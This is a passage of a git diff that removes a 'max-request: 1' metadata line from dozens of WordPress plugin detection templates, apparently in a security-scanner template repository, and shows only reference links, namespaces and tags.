wpscan: https://wpscan.com/plugin/sg-security
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 648ee176ce..656ad7dfe5 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/shortcodes-ultimate/
metadata:
- max-request: 1
plugin_namespace: shortcodes-ultimate
wpscan: https://wpscan.com/plugin/shortcodes-ultimate
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/shortpixel-image-optimiser/
metadata:
- max-request: 1
plugin_namespace: shortpixel-image-optimiser
wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/simple-custom-post-order/
metadata:
- max-request: 1
plugin_namespace: simple-custom-post-order
wpscan: https://wpscan.com/plugin/simple-custom-post-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/siteguard/
metadata:
- max-request: 1
plugin_namespace: siteguard
wpscan: https://wpscan.com/plugin/siteguard
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/siteorigin-panels/
metadata:
- max-request: 1
plugin_namespace: siteorigin-panels
wpscan: https://wpscan.com/plugin/siteorigin-panels
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/smart-slider-3/
metadata:
- max-request: 1
plugin_namespace: smart-slider-3
wpscan: https://wpscan.com/plugin/smart-slider-3
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/so-widgets-bundle/
metadata:
- max-request: 1
plugin_namespace: so-widgets-bundle
wpscan: https://wpscan.com/plugin/so-widgets-bundle
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
metadata:
- max-request: 1
plugin_namespace: stops-core-theme-and-plugin-updates
wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/sucuri-scanner/
metadata:
- max-request: 1
plugin_namespace: sucuri-scanner
wpscan: https://wpscan.com/plugin/sucuri-scanner
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/svg-support/
metadata:
- max-request: 1
plugin_namespace: svg-support
wpscan: https://wpscan.com/plugin/svg-support
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/table-of-contents-plus/
metadata:
- max-request: 1
plugin_namespace: table-of-contents-plus
wpscan: https://wpscan.com/plugin/table-of-contents-plus
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/tablepress/
metadata:
- max-request: 1
plugin_namespace: tablepress
wpscan: https://wpscan.com/plugin/tablepress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/taxonomy-terms-order/
metadata:
- max-request: 1
plugin_namespace: taxonomy-terms-order
wpscan: https://wpscan.com/plugin/taxonomy-terms-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/the-events-calendar/
metadata:
- max-request: 1
plugin_namespace: the-events-calendar
wpscan: https://wpscan.com/plugin/the-events-calendar
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/themeisle-companion/
metadata:
- max-request: 1
plugin_namespace: themeisle-companion
wpscan: https://wpscan.com/plugin/themeisle-companion
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/tinymce-advanced/
metadata:
- max-request: 1
plugin_namespace: tinymce-advanced
wpscan: https://wpscan.com/plugin/tinymce-advanced
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/translatepress-multilingual/
metadata:
- max-request: 1
plugin_namespace: translatepress-multilingual
wpscan: https://wpscan.com/plugin/translatepress-multilingual
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
metadata:
- max-request: 1
plugin_namespace: ultimate-addons-for-gutenberg
wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 48481fde3b..b7ad16e281 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/under-construction-page/
metadata:
- max-request: 1
plugin_namespace: under-construction-page
wpscan: https://wpscan.com/plugin/under-construction-page
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index b34d196268..10fd071b0b 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/updraftplus/
metadata:
- max-request: 1
plugin_namespace: updraftplus
wpscan: https://wpscan.com/plugin/updraftplus
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/use-any-font/
metadata:
- max-request: 1
plugin_namespace: use-any-font
wpscan: https://wpscan.com/plugin/use-any-font
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/user-role-editor/
metadata:
- max-request: 1
plugin_namespace: user-role-editor
wpscan: https://wpscan.com/plugin/user-role-editor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/velvet-blues-update-urls/
metadata:
- max-request: 1
plugin_namespace: velvet-blues-update-urls
wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/w3-total-cache/
metadata:
- max-request: 1
plugin_namespace: w3-total-cache
wpscan: https://wpscan.com/plugin/w3-total-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/webp-converter-for-media/
metadata:
- max-request: 1
plugin_namespace: webp-converter-for-media
wpscan: https://wpscan.com/plugin/webp-converter-for-media
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/webp-express/
metadata:
- max-request: 1
plugin_namespace: webp-express
wpscan: https://wpscan.com/plugin/webp-express
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/widget-importer-exporter/
metadata:
- max-request: 1
plugin_namespace: widget-importer-exporter
wpscan: https://wpscan.com/plugin/widget-importer-exporter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woo-cart-abandonment-recovery/
metadata:
- max-request: 1
plugin_namespace: woo-cart-abandonment-recovery
wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woo-checkout-field-editor-pro/
metadata:
- max-request: 1
plugin_namespace: woo-checkout-field-editor-pro
wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woo-variation-swatches/
metadata:
- max-request: 1
plugin_namespace: woo-variation-swatches
wpscan: https://wpscan.com/plugin/woo-variation-swatches
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
metadata:
- max-request: 1
plugin_namespace: woocommerce-gateway-paypal-express-checkout
wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-gateway-stripe/
metadata:
- max-request: 1
plugin_namespace: woocommerce-gateway-stripe
wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 54dce49b42..1d41b4ec2c 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-payments/
metadata:
- max-request: 1
plugin_namespace: woocommerce-payments
wpscan: https://wpscan.com/plugin/woocommerce-payments
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-paypal-payments/
metadata:
- max-request: 1
plugin_namespace: woocommerce-paypal-payments
wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
metadata:
- max-request: 1
plugin_namespace: woocommerce-pdf-invoices-packing-slips
wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-services/
metadata:
- max-request: 1
plugin_namespace: woocommerce-services
wpscan: https://wpscan.com/plugin/woocommerce-services
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce/
metadata:
- max-request: 1
plugin_namespace: woocommerce
wpscan: https://wpscan.com/plugin/woocommerce
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wordfence/
metadata:
- max-request: 1
plugin_namespace: wordfence
wpscan: https://wpscan.com/plugin/wordfence
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wordpress-importer/
metadata:
- max-request: 1
plugin_namespace: wordpress-importer
wpscan: https://wpscan.com/plugin/wordpress-importer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wordpress-seo/
metadata:
- max-request: 1
plugin_namespace: wordpress-seo
wpscan: https://wpscan.com/plugin/wordpress-seo
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/worker/
metadata:
- max-request: 1
plugin_namespace: worker
wpscan: https://wpscan.com/plugin/worker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-fastest-cache/
metadata:
- max-request: 1
plugin_namespace: wp-fastest-cache
wpscan: https://wpscan.com/plugin/wp-fastest-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-file-manager/
metadata:
- max-request: 1
plugin_namespace: wp-file-manager
wpscan: https://wpscan.com/plugin/wp-file-manager
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-google-maps/
metadata:
- max-request: 1
plugin_namespace: wp-google-maps
wpscan: https://wpscan.com/plugin/wp-google-maps
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-mail-smtp/
metadata:
- max-request: 1
plugin_namespace: wp-mail-smtp
wpscan: https://wpscan.com/plugin/wp-mail-smtp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-maintenance-mode/
metadata:
- max-request: 1
plugin_namespace: wp-maintenance-mode
wpscan: https://wpscan.com/plugin/wp-maintenance-mode
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-migrate-db/
metadata:
- max-request: 1
plugin_namespace: wp-migrate-db
wpscan: https://wpscan.com/plugin/wp-migrate-db
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-multibyte-patch/
metadata:
- max-request: 1
plugin_namespace: wp-multibyte-patch
wpscan: https://wpscan.com/plugin/wp-multibyte-patch
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-optimize/
metadata:
- max-request: 1
plugin_namespace: wp-optimize
wpscan: https://wpscan.com/plugin/wp-optimize
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-pagenavi/
metadata:
- max-request: 1
plugin_namespace: wp-pagenavi
wpscan: https://wpscan.com/plugin/wp-pagenavi
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-reset/
metadata:
- max-request: 1
plugin_namespace: wp-reset
wpscan: https://wpscan.com/plugin/wp-reset
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-sitemap-page/
metadata:
- max-request: 1
plugin_namespace: wp-sitemap-page
wpscan: https://wpscan.com/plugin/wp-sitemap-page
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 2ead906817..8bdc600063 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-smushit/
metadata:
- max-request: 1
plugin_namespace: wp-smushit
wpscan: https://wpscan.com/plugin/wp-smushit
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
